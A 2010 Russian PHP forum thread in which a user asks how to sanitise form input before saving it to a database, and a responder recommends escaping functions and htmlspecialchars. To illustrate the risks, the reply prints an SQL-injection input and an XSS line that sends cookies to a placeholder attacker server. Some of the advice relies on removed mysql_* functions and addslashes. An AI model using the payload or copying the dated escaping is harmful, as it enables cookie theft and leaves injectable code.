Заказ-online

@Nazz · Регистрация: 12.03.2009

Студворк — интернет-сервис помощи студентам

Делаю форму заказа товаро по интернет. Все переменные передаются с html-документа в php-обработчик методом $_POST. Как вы мне посоветуете проверять ети переменные на запрещённые символи, или же что-то типа такого??? Проверять нужно перед тем, как занесу их в базу данных...?

Humanoid · 16.06.2010, 12:48

Всё как обычно. Когда получаешь данные, то их надо экранировать через mysql_real_escape_string... или в крайнем случае через addslashes
Если ты ожидаешь числовую переменную, то принудительно приведи её к числовому виду или в запросе возьми её в кавычки. А лучше сделать и то и другое.
При выводе на экран чего-либо обязательно используй htmlspecialchars

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mysql_connect(...);
....
mysql_query('SET NAMES.....');
....
if (isset($_POST['name']))
  $name=mysql_real_escape_string($_POST['name'],$db);
else
  $name='';
 
if (isset($_POST['id']))
  $id=(int)$_POST['id']; // (int) как раз явно указывает числовой тип переменной.
else
  $id=0;
.....
mysql_query("UPDATE tab SET name='$name' WHERE id='$id'");
echo "Имя <b>".htmlspecialchars($name,ENT_QUOTES,'UTF-8')."</b> успешно обновлено";

Например, если $_POST['name'] будет содержать

Code
1
';

...то без экранирования это может повредить всю таблицу, потому что получится запрос

SQL
1
UPDATE tab SET name='';' WHERE id='$id'

Вторую его часть PHP откинет из соображений безопасности, но первая сотрёт все name в таблице.

Или вдруг name будет содержать

Code
1
<script>location.href="<сервер злоумышленника>a.php?c="+document.cookies;</script>

То тогда без htmlspecialchars куки будут отправлены злоумышленнику. (только на счёт правильности document.cookies не уверен)

В htmlspecialchars указывать кодировку имеет смысл только для необычных кодировок. Хотя, я привёл пример с utf-8, но на самом деле для него не обязательно указывать... так же как и для cp1251.
Обрати внимание, что для работы mysql_real_escape_string нужно, что бы уже было установлено соединение с БД и выбрана кодировка. Именно возможностью работать с кодировкой БД и отличается mysql_real_escape_string от addslashes (и ещё символ 1A экранирует... но mysql и без экранирования нормально его проглатывает). addslashes нельзя использовать для некоторых сложных кодировок... но с cp1251 и utf8 он работает правильно. Лично я предпочитаю addslashes, т.к. ему не нужно установленное подключение к БД.

@Nazz · 16.06.2010, 13:01 **[ТС]**

спасибо большое, сейчас посмотрю, и попробую разобратся, естли что, то напишу))

Добавлено через 5 минут
тоесть как я понял, то Вы имеете ввиду, что естли я зделаю так

PHP
1
2
3
4
$name=addslashes($_POST['name']);
$familie=addslashes($_POST['familie']);
$father_name=addslashes($_POST['father_name']);
$home_adress=addslashes($_POST['home_adress']);

то такого екранирования будет достаточно перед записью в БД?

Humanoid · 16.06.2010, 13:12

Да. Только перед этим надо убедиться, что выключен magic_quotes_gpc, иначе получится двойное экранирование... угрозы безопасности это не представляет, но к некоторым символам будет добавлен слеш. Например, это можно сделать так:

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
if (get_magic_quotes_gpc()) // если magic_quotes_gpc включен, то можно самим не экранировать
{
  $name=$_POST['name'];
  $familie=$_POST['familie'];
  $father_name=$_POST['father_name'];
  $home_adress=$_POST['home_adress'];
} else
{
  $name=addslashes($_POST['name']);
  $familie=addslashes($_POST['familie']);
  $father_name=addslashes($_POST['father_name']);
  $home_adress=addslashes($_POST['home_adress']);
}

Хотя, обычно magic_quotes_gpc бывает выключен. Просто на некоторых старых версиях он был включен изначально. А начиная с PHP6 этой опции вообще не будет.

@Nazz · 16.06.2010, 13:14 **[ТС]**

ок)) спасибо большое)

Новые блоги и статьи Все статьи Все блоги /
Изучаю kubernetes lagorue 13.01.2026 А пригодятся-ли мне знания kubernetes в России?	Сукцессия микоризы: основная теория в виде двух уравнений. anaschu 11.01.2026 https:/ / rutube. ru/ video/ 7a537f578d808e67a3c6fd818a44a5c4/	WordPad для Windows 11 Jel 10.01.2026 WordPad для Windows 11 — это приложение, которое восстанавливает классический текстовый редактор WordPad в операционной системе Windows 11. После того как Microsoft исключила WordPad из. . .	Classic Notepad for Windows 11 Jel 10.01.2026 Old Classic Notepad for Windows 11 Приложение для Windows 11, позволяющее пользователям вернуть классическую версию текстового редактора «Блокнот» из Windows 10. Программа предоставляет более. . .
Почему дизайн решает? Neotwalker 09.01.2026 В современном мире, где конкуренция за внимание потребителя достигла пика, дизайн становится мощным инструментом для успеха бренда. Это не просто красивый внешний вид продукта или сайта — это. . .	Модель микоризы: классовый агентный подход 3 anaschu 06.01.2026 aa0a7f55b50dd51c5ec569d2d10c54f6/ O1rJuneU_ls https:/ / vkvideo. ru/ video-115721503_456239114	Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ФедосеевПавел 06.01.2026 Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ВВЕДЕНИЕ Введу сокращения: аналоговый ПИД — ПИД регулятор с управляющим выходом в виде числа в диапазоне от 0% до. . .	Модель микоризы: классовый агентный подход 2 anaschu 06.01.2026 репозиторий https:/ / github. com/ shumilovas/ fungi ветка по-частям. коммит Create переделка под биомассу. txt вход sc, но sm считается внутри мицелия. кстати, обьем тоже должен там считаться. . . .

@Nazz 898 / 729 / 80 Регистрация: 12.03.2009 Сообщений: 2,804 Записей в блоге: 2

	Заказ-online 16.06.2010, 12:01. Показов 1004. Ответов 4 Метки нет (Все метки) Делаю форму заказа товаро по интернет. Все переменные передаются с html-документа в php-обработчик методом $_POST. Как вы мне посоветуете проверять ети переменные на запрещённые символи, или же что-то типа такого??? Проверять нужно перед тем, как занесу их в базу данных...? 0

@Nazz 898 / 729 / 80 Регистрация: 12.03.2009 Сообщений: 2,804 Записей в блоге: 2
	16.06.2010, 13:14 [ТС]
	ок)) спасибо большое) 0